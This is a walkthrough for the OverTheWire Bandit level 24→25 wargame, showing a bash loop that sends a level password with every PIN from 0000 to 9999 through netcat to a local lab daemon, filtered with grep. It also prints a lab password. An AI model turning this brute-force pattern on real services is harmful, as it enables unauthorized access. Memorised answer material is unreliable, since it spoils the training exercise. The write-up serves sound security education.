OverTheWire Bandit: Level 24 → Level 25

Context

A daemon is listening on port 30002. It requires two things:

1. The password for Bandit 24.
2. A secret 4-digit PIN code.

There is no way to find the PIN other than trying every number from 0000 to 9999. This is called a Brute-Force attack.

Hint: “You do not need to create new connections each time.” This means we can send all attempts through a single connection stream.

Solution

Step 1: Strategy

Typing 10,000 PINs manually is impossible. We will write a script. Our script will:

1. Loop from 0000 to 9999.
2. Print the format [Password] [PIN] for each number.
3. Pipe (|) this output into nc (netcat).

Step 2: Prepare the Script

Let’s move to a workspace:

mkdir -p /tmp/bruteforce
cd /tmp/bruteforce
nano breaker.sh

Script Content:

#!/bin/bash

# Bandit 24 Password
PASS="iCeGdTE7FqfRMCw5lhC05b2x0qX3hZU"

# {0000..9999} expands to all numbers with leading zeros
for i in {0000..9999}
do
    echo "$PASS $i"
done

Save and exit (Ctrl+O, Enter, Ctrl+X).

You must make the script executable before running it:

chmod +x breaker.sh

Step 3: Launch the Attack

Now, let’s pipe the output of our script directly into the network connection. We will receive thousands of “Wrong! Please enter the correct pincode” messages. To find the needle in the haystack, we use grep.

grep -v "Wrong" hides any line containing “Wrong”, showing us only the success message.

./breaker.sh | nc localhost 30002 | grep -v "Wrong"

It will blast through the combinations and print the password for Bandit 25 when it hits the correct PIN.

Step 4: Save the Password

You will see Correct! and the new password. Save it.

Key Takeaways

1. Brute-Force: A method of breaking a password by trying all possible combinations.
2. Bash Range Expansion: using {0000..9999} to generate sequences.
3. Pipelining: Creating a stream of data (thousands of guesses) and feeding it into another program (nc). This is much faster than opening 10,000 separate connections.